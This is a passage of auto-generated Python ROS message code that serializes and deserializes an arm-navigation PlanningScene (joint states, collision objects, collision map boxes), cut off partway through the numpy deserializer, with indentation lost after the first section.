        for val2 in val1.poses:
          _v130 = val2.position
          _x = _v130
          buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
          _v131 = val2.orientation
          _x = _v131
          buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
      # --- attached_collision_objects (AttachedCollisionObject[]) ---
      length = len(self.planning_scene.attached_collision_objects)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.attached_collision_objects:
        _x = val1.link_name
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _v132 = val1.object
        _v133 = _v132.header
        buff.write(_struct_I.pack(_v133.seq))
        _v134 = _v133.stamp
        _x = _v134
        buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
        _x = _v133.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _x = _v132.id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        buff.write(_struct_f.pack(_v132.padding))
        _v135 = _v132.operation
        buff.write(_struct_b.pack(_v135.operation))
        length = len(_v132.shapes)
        buff.write(_struct_I.pack(length))
        for val3 in _v132.shapes:
          buff.write(_struct_b.pack(val3.type))
          length = len(val3.dimensions)
          buff.write(_struct_I.pack(length))
          pattern = '<%sd'%length
          buff.write(struct.pack(pattern, *val3.dimensions))
          length = len(val3.triangles)
          buff.write(_struct_I.pack(length))
          pattern = '<%si'%length
          buff.write(struct.pack(pattern, *val3.triangles))
          length = len(val3.vertices)
          buff.write(_struct_I.pack(length))
          for val4 in val3.vertices:
            _x = val4
            buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        length = len(_v132.poses)
        buff.write(_struct_I.pack(length))
        for val3 in _v132.poses:
          _v136 = val3.position
          _x = _v136
          buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
          _v137 = val3.orientation
          _x = _v137
          buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
        length = len(val1.touch_links)
        buff.write(_struct_I.pack(length))
        for val2 in val1.touch_links:
          length = len(val2)
          if python3 or type(val2) == unicode:
            val2 = val2.encode('utf-8')
            length = len(val2)
          buff.write(struct.pack('<I%ss'%length, length, val2))
      # --- collision_map (header + OrientedBoundingBox[]) ---
      _x = self
      buff.write(_struct_3I.pack(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs))
      _x = self.planning_scene.collision_map.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.planning_scene.collision_map.boxes)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene.collision_map.boxes:
        _v138 = val1.center
        _x = _v138
        buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
        _v139 = val1.extents
        _x = _v139
        buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
        _v140 = val1.axis
        _x = _v140
        buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
        buff.write(_struct_f.pack(val1.angle))
    except struct.error as se: self._check_types(se)
    except TypeError as te: self._check_types(te)
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.planning_scene is None:
self.planning_scene = arm_navigation_msgs.msg.PlanningScene()
end = 0
_x = self
start = end
end += 12
(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene.robot_state.joint_state.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.joint_state.name = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.joint_state.name.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.position = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.velocity = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.effort = struct.unpack(pattern, str[start:end])
_x = self
start = end
end += 8
(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v141 = val1.position
_x = _v141
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v142 = val1.orientation
_x = _v142
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.fixed_frame_transforms = []
for i in range(0, length):
val1 = geometry_msgs.msg.TransformStamped()
_v143 = val1.header
start = end
end += 4
(_v143.seq,) = _struct_I.unpack(str[start:end])
_v144 = _v143.stamp
_x = _v144
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v143.frame_id = str[start:end].decode('utf-8')
else:
_v143.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.child_frame_id = str[start:end].decode('utf-8')
else:
val1.child_frame_id = str[start:end]
_v145 = val1.transform
_v146 = _v145.translation
_x = _v146
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v147 = _v145.rotation
_x = _v147
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene.fixed_frame_transforms.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_collision_matrix.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.allowed_collision_matrix.link_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_collision_matrix.entries = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedCollisionEntry()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sB'%length
start = end
end += struct.calcsize(pattern)
val1.enabled = struct.unpack(pattern, str[start:end])
val1.enabled = map(bool, val1.enabled)
self.planning_scene.allowed_collision_matrix.entries.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_contacts = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedContactSpecification()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8')
else:
val1.name = str[start:end]
_v148 = val1.shape
start = end
end += 1
(_v148.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
_v148.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
_v148.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v148.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v148.vertices.append(val3)
_v149 = val1.pose_stamped
_v150 = _v149.header
start = end
end += 4
(_v150.seq,) = _struct_I.unpack(str[start:end])
_v151 = _v150.stamp
_x = _v151
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v150.frame_id = str[start:end].decode('utf-8')
else:
_v150.frame_id = str[start:end]
_v152 = _v149.pose
_v153 = _v152.position
_x = _v153
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v154 = _v152.orientation
_x = _v154
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.link_names.append(val2)
start = end
end += 8
(val1.penetration_depth,) = _struct_d.unpack(str[start:end])
self.planning_scene.allowed_contacts.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.link_padding = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.LinkPadding()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
start = end
end += 8
(val1.padding,) = _struct_d.unpack(str[start:end])
self.planning_scene.link_padding.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionObject()
_v155 = val1.header
start = end
end += 4
(_v155.seq,) = _struct_I.unpack(str[start:end])
_v156 = _v155.stamp
_x = _v156
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v155.frame_id = str[start:end].decode('utf-8')
else:
_v155.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8')
else:
val1.id = str[start:end]
start = end
end += 4
(val1.padding,) = _struct_f.unpack(str[start:end])
_v157 = val1.operation
start = end
end += 1
(_v157.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.shapes = []
for i in range(0, length):
val2 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val2.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val2.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val2.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val2.vertices.append(val3)
val1.shapes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v158 = val2.position
_x = _v158
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v159 = val2.orientation
_x = _v159
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
val1.poses.append(val2)
self.planning_scene.collision_objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.attached_collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AttachedCollisionObject()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
_v160 = val1.object
_v161 = _v160.header
start = end
end += 4
(_v161.seq,) = _struct_I.unpack(str[start:end])
_v162 = _v161.stamp
_x = _v162
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v161.frame_id = str[start:end].decode('utf-8')
else:
_v161.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v160.id = str[start:end].decode('utf-8')
else:
_v160.id = str[start:end]
start = end
end += 4
(_v160.padding,) = _struct_f.unpack(str[start:end])
_v163 = _v160.operation
start = end
end += 1
(_v163.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v160.shapes = []
for i in range(0, length):
val3 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val3.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val3.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val3.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val3.vertices.append(val4)
_v160.shapes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v160.poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v164 = val3.position
_x = _v164
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v165 = val3.orientation
_x = _v165
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
_v160.poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.touch_links = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.touch_links.append(val2)
self.planning_scene.attached_collision_objects.append(val1)
_x = self
start = end
end += 12
(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene.collision_map.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene.collision_map.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.collision_map.boxes = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.OrientedBoundingBox()
_v166 = val1.center
_x = _v166
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v167 = val1.extents
_x = _v167
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v168 = val1.axis
_x = _v168
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
start = end
end += 4
(val1.angle,) = _struct_f.unpack(str[start:end])
self.planning_scene.collision_map.boxes.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs))
_x = self.planning_scene.robot_state.joint_state.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene.robot_state.joint_state.name)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.joint_state.name:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.joint_state.position)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene.robot_state.joint_state.position.tostring())
length = len(self.planning_scene.robot_state.joint_state.velocity)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene.robot_state.joint_state.velocity.tostring())
length = len(self.planning_scene.robot_state.joint_state.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene.robot_state.joint_state.effort.tostring())
_x = self
buff.write(_struct_2I.pack(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.poses)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.poses:
_v169 = val1.position
_x = _v169
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v170 = val1.orientation
_x = _v170
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene.fixed_frame_transforms)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.fixed_frame_transforms:
_v171 = val1.header
buff.write(_struct_I.pack(_v171.seq))
_v172 = _v171.stamp
_x = _v172
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v171.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.child_frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v173 = val1.transform
_v174 = _v173.translation
_x = _v174
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v175 = _v173.rotation
_x = _v175
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene.allowed_collision_matrix.link_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.allowed_collision_matrix.link_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.allowed_collision_matrix.entries)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.allowed_collision_matrix.entries:
length = len(val1.enabled)
buff.write(_struct_I.pack(length))
pattern = '<%sB'%length
buff.write(val1.enabled.tostring())
length = len(self.planning_scene.allowed_contacts)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.allowed_contacts:
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v176 = val1.shape
buff.write(_struct_b.pack(_v176.type))
length = len(_v176.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(_v176.dimensions.tostring())
length = len(_v176.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(_v176.triangles.tostring())
length = len(_v176.vertices)
buff.write(_struct_I.pack(length))
for val3 in _v176.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v177 = val1.pose_stamped
_v178 = _v177.header
buff.write(_struct_I.pack(_v178.seq))
_v179 = _v178.stamp
_x = _v179
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v178.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v180 = _v177.pose
_v181 = _v180.position
_x = _v181
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v182 = _v180.orientation
_x = _v182
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.link_names)
buff.write(_struct_I.pack(length))
for val2 in val1.link_names:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
buff.write(_struct_d.pack(val1.penetration_depth))
length = len(self.planning_scene.link_padding)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.link_padding:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_d.pack(val1.padding))
length = len(self.planning_scene.collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.collision_objects:
_v183 = val1.header
buff.write(_struct_I.pack(_v183.seq))
_v184 = _v183.stamp
_x = _v184
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v183.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(val1.padding))
_v185 = val1.operation
buff.write(_struct_b.pack(_v185.operation))
length = len(val1.shapes)
buff.write(_struct_I.pack(length))
for val2 in val1.shapes:
buff.write(_struct_b.pack(val2.type))
length = len(val2.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val2.dimensions.tostring())
length = len(val2.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(val2.triangles.tostring())
length = len(val2.vertices)
buff.write(_struct_I.pack(length))
for val3 in val2.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(val1.poses)
buff.write(_struct_I.pack(length))
for val2 in val1.poses:
_v186 = val2.position
_x = _v186
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v187 = val2.orientation
_x = _v187
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene.attached_collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.attached_collision_objects:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v188 = val1.object
_v189 = _v188.header
buff.write(_struct_I.pack(_v189.seq))
_v190 = _v189.stamp
_x = _v190
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v189.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = _v188.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(_v188.padding))
_v191 = _v188.operation
buff.write(_struct_b.pack(_v191.operation))
length = len(_v188.shapes)
buff.write(_struct_I.pack(length))
for val3 in _v188.shapes:
buff.write(_struct_b.pack(val3.type))
length = len(val3.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.dimensions.tostring())
length = len(val3.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(val3.triangles.tostring())
length = len(val3.vertices)
buff.write(_struct_I.pack(length))
for val4 in val3.vertices:
_x = val4
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(_v188.poses)
buff.write(_struct_I.pack(length))
for val3 in _v188.poses:
_v192 = val3.position
_x = _v192
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v193 = val3.orientation
_x = _v193
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.touch_links)
buff.write(_struct_I.pack(length))
for val2 in val1.touch_links:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
_x = self
buff.write(_struct_3I.pack(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs))
_x = self.planning_scene.collision_map.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene.collision_map.boxes)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.collision_map.boxes:
_v194 = val1.center
_x = _v194
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v195 = val1.extents
_x = _v195
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v196 = val1.axis
_x = _v196
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
buff.write(_struct_f.pack(val1.angle))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.planning_scene is None:
self.planning_scene = arm_navigation_msgs.msg.PlanningScene()
end = 0
_x = self
start = end
end += 12
(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene.robot_state.joint_state.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.joint_state.name = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.joint_state.name.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_x = self
start = end
end += 8
